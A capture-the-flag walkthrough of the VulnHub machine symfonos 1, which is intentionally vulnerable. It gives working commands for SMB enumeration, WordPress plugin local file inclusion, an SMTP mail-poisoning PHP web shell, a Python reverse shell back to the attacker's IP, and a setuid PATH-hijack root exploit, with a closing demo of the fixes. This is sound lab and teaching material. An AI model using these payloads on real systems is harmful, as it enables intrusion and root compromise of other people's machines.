【攻略鴨】symfonos 1 VulnHub machine walkthrough

This article is entirely fictional. Please follow and like 攻略鴨 on Bilibili!
Set the VM's network adapter to NAT.
Target IP: 192.168.31.145
Attacker IP: 192.168.31.37
External information gathering
http://192.168.31.145/ shows nothing but an image.
Directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.145/FUZZ
http://192.168.31.145/manual/
http://192.168.31.145/image.jpg
http://192.168.31.145/index.html
Port scan
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp  open  smtp        syn-ack ttl 64 Postfix smtpd
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Issuer: commonName=symfonos
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian
137/udp open  netbios-ns  udp-response ttl 64 Samba nmbd netbios-ns
Three services worth noting: SMB (shares may be listable without credentials), Postfix accepting mail for local users (VRFY is enabled too), and Apache.
SMB null-session login
$ smbclient -L 192.168.31.145
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        helios          Disk      Helios personal share
        anonymous       Disk
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
smbclient "\\\\192.168.31.145\IPC$"
smb: \> ls
smbclient "\\\\192.168.31.145\anonymous"
smb: \> ls
  attention.txt
smb: \> get attention.txt
smbclient "\\\\192.168.31.145\helios"
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
smbclient "\\\\192.168.31.145\print$"
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
The null session is enough to list shares and to read the anonymous share; helios and print$ require credentials.
Instead of smbclient you can also open smb://192.168.31.145/ directly in the Kali file manager.
Contents of attention.txt:
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-Zeus
Try the passwords leaked in the note against SMB. helios:qwerty is accepted:
smbclient "\\\\192.168.31.145\helios" -U helios%qwerty
smb: \> ls
  research.txt                        A      432  Fri Jun 28 20:32:05 2019
  todo.txt                            A       52  Fri Jun 28 20:32:05 2019
smb: \> get research.txt
smb: \> get todo.txt
Contents of research.txt:
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
Nothing useful here.
Contents of todo.txt:
1. Binge watch Dexter
2. Dance
3. Work on /h3l105
This reveals a /h3l105 directory on the web server.
WordPress
http://192.168.31.145/h3l105/ is a WordPress site.
sudo wpscan --url http://192.168.31.145/h3l105/ --enumerate vt,vp,u
WordPress version 5.2.2 identified (Insecure, released on 2019-06-18)
Username found: admin
http://192.168.31.145/h3l105/wp-content/uploads/
Capturing the page in Burp Suite shows the browser being sent to the hostname symfonos.local for the site's resources, so it has to resolve locally before the site (and wpscan) will work properly. Add it to /etc/hosts:
192.168.31.145 symfonos.local
$ sudo wpscan --url http://symfonos.local/h3l105/
Plugin(s)
[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
[+] site-editor
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
Search for and verify known vulnerabilities in the two plugins
$ searchsploit wordpress mail masta
------------------------------------------------------------- -----------------------
 Exploit Title                                                |  Path
------------------------------------------------------------- -----------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion        | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)    | php/webapps/50226.py
WordPress Plugin Mail Masta 1.0 - SQL Injection               | php/webapps/41438.txt

$ searchsploit wordpress site editor
------------------------------------------------------------- -----------------------
 Exploit Title                                                |  Path
------------------------------------------------------------- -----------------------
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion     | php/webapps/44340.txt
WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery | php/webapps/25721.txt

searchsploit -m 40290.txt
PoC: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
LFI confirmed.

searchsploit -m 50226.py
~# python2 50226.py http://symfonos.local/h3l105
[*] Checking if the Mail-Masta endpoint is vulnerable...
[!] Endpoint vulnerable!

searchsploit -m 41438.txt
Target script: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php
sqlmap -u "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0*&pl=/var/www/html/wordpress/wp-load.php" --batch
Could not confirm the SQL injection. A likely reason: the PoC's pl value assumes WordPress is installed at /var/www/html/wordpress, but on this target the site lives under /h3l105, so the include that is meant to pull in wp-load.php (and with it $wpdb) probably never succeeds and the injected query is never run.

searchsploit -m 44340.txt
PoC: http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
LFI confirmed. Result:
root:x:0:0:root:/root:/bin/bash
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false
helios is the only regular user with a login shell.
Exploiting the LFI
First attempt: read wp-config.php through the site-editor LFI using the php://filter wrapper, which returns the PHP source base64-encoded instead of executing it (a plain include of wp-config.php would run it and print nothing):
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=php://filter/convert.base64-encode/resource=../../../../../wp-config.php
This failed. After reproducing it in a lab environment, my guess is that the `once` include is the reason; switch to the other exploit:
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php
Result (after base64-decoding the response):
'DB_NAME', 'wordpress'
'DB_USER', 'wordpress'
'DB_PASSWORD', 'password123'
'DB_HOST', 'localhost'
Trying password123 over SSH fails.
Mail spool poisoning over SMTP: turning the LFI into RCE
Try reading the Apache access log through the LFI (on Debian /var/log/apache2 is owned by root:adm and not readable by the web server's user, so this is expected to fail):
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/log/apache2/access.log
Try reading helios's mailbox instead. Postfix is listening on port 25 and delivers local mail to /var/mail/<user> in mbox format, so this file is one we can append to from the outside:
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios
The mailbox is included and displayed, so anything mailed to helios lands in a file the LFI will execute as PHP. Send a one-line web shell as the message body:
$ nc 192.168.31.145 25
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM:asdf
250 2.1.0 Ok
RCPT TO:helios
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET["cmd"]);?>
.
250 2.0.0 Ok: queued as 9ABDC4084A
QUIT
221 2.0.0 Bye
Now include the mailbox again with a cmd parameter:
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&cmd=id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Note that the command runs as helios, not www-data: PHP on this box runs under the helios account, which is also why the mailbox was readable in the first place.
Getting a shell
Start a listener on the attacker machine:
nc -nvlp 443
Then request the poisoned mailbox with a Python reverse shell as cmd (if you send it with curl rather than from the browser's address bar, URL-encode the value; the spaces, quotes and parentheses must not reach the server raw):
http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.37",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Once the connection comes back, upgrade it to a PTY:
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege escalation
Local enumeration
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
/opt/statuscheck is the only setuid binary that is not part of the base system.
statuscheck
cat /opt/statuscheck prints binary garbage, so use file and strings instead:
file /opt/statuscheck
/opt/statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
strings /opt/statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
Two things matter here: the binary imports system(), and the command string is stored as three 8-byte immediates (the trailing H on each fragment is the 0x48 REX prefix of the next movabs instruction that builds the string on the stack). Assembled, they read "curl -I http://localhost", so the program calls system("curl -I http://localhost") with curl named relatively, which means it is resolved through PATH.
Privilege escalation by hijacking PATH
A setuid binary inherits the caller's PATH unchanged (the dynamic loader's secure-execution mode only ignores variables such as LD_PRELOAD and LD_LIBRARY_PATH), so a directory we control placed first in PATH decides which curl system() ends up running, with the effective uid 0 the setuid bit provides. Build a fake curl that turns that into a root shell:
cd /tmp
cat > curl.c <<'EOF'
#include <unistd.h>

/* Dropped in /tmp as "curl": statuscheck's system("curl -I http://localhost")
 * finds this first once /tmp leads PATH, and runs it with euid 0. */
int main(void) {
        setgid(0); setuid(0);            /* make the real ids root too, so the shell keeps them */
        execl("/bin/sh", "sh", (char *)NULL);
        return 1;                        /* only reached if execl fails */
}
EOF
gcc curl.c -o curl
env
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH=/tmp:$PATH
env
PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
/opt/statuscheck
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(helios)
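The mechanism behind this escalation, reproduced without root so it can be run anywhere. This is an added example for this walkthrough, not the source of /opt/statuscheck: it approximates the binary's system("curl -I http://localhost") call with /bin/sh -c, plants a stand-in for the curl built above in a writable directory, and shows the lookup being hijacked when that directory leads PATH. It also shows the two fixes a setuid program needs: calling the helper by absolute path, or resetting PATH to a fixed trusted value before system(). The "trusted" directory and both curl scripts are constructed in temporary directories.

```python
"""PATH hijacking of a setuid binary's system() call: vulnerable lookup and both fixes.

Added example for this walkthrough; not statuscheck's own code. No setuid bit is
involved: the point is which `curl` /bin/sh resolves, not the privileges.
"""
import os
import shutil
import stat
import subprocess
import tempfile


def _write_script(directory: str, name: str, message: str) -> str:
    """Create an executable shell script that prints `message` and ignores its arguments."""
    path = os.path.join(directory, name)
    with open(path, "w") as f:
        f.write(f"#!/bin/sh\necho {message}\n")
    os.chmod(path, os.stat(path).st_mode | stat.S_IRUSR | stat.S_IXUSR)
    return path


def make_lab() -> dict:
    """Two directories: a trusted one holding the 'real' curl, a writable one holding ours."""
    trusted = tempfile.mkdtemp(prefix="trusted-bin-")   # stands in for /usr/bin
    writable = tempfile.mkdtemp(prefix="tmp-")          # stands in for /tmp
    _write_script(trusted, "curl", "REAL")
    _write_script(writable, "curl", "HIJACKED")         # stands in for /tmp/curl from curl.c
    return {"trusted": trusted, "writable": writable}


def cleanup(lab: dict) -> None:
    for d in lab.values():
        shutil.rmtree(d, ignore_errors=True)


def run_via_system(command: str, path: str) -> str:
    """Approximates C's system(): /bin/sh -c <command>, with PATH as the only variable."""
    r = subprocess.run(command, shell=True, env={"PATH": path},
                       capture_output=True, text=True, check=False)
    return r.stdout.strip()


def statuscheck_vulnerable(lab: dict) -> str:
    """What /opt/statuscheck does: relative name, PATH inherited from the caller (/tmp first)."""
    return run_via_system("curl -I http://localhost", f"{lab['writable']}:{lab['trusted']}")


def statuscheck_absolute(lab: dict) -> str:
    """Fix 1: name the helper by absolute path; the caller's PATH no longer matters."""
    return run_via_system(f"{lab['trusted']}/curl -I http://localhost",
                          f"{lab['writable']}:{lab['trusted']}")


def statuscheck_sanitised(lab: dict) -> str:
    """Fix 2: a setuid program resets PATH to a fixed trusted value before calling system()."""
    return run_via_system("curl -I http://localhost", lab["trusted"])


def demo(lab: dict) -> dict:
    return {
        "vulnerable": statuscheck_vulnerable(lab),
        "absolute_path": statuscheck_absolute(lab),
        "sanitised_path": statuscheck_sanitised(lab),
    }


if __name__ == "__main__":
    lab = make_lab()
    try:
        for name, out in demo(lab).items():
            print(f"{name:15s} -> {out}")
    finally:
        cleanup(lab)
```

The same trick does not work against a binary that uses execve() with a full path, and it is independent of the shell flags the page used: `export PATH=/tmp:$PATH` is exactly the PATH the vulnerable variant above is given.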
Flag
cat /root/proof.txt
Congrats on rooting symfonos:1!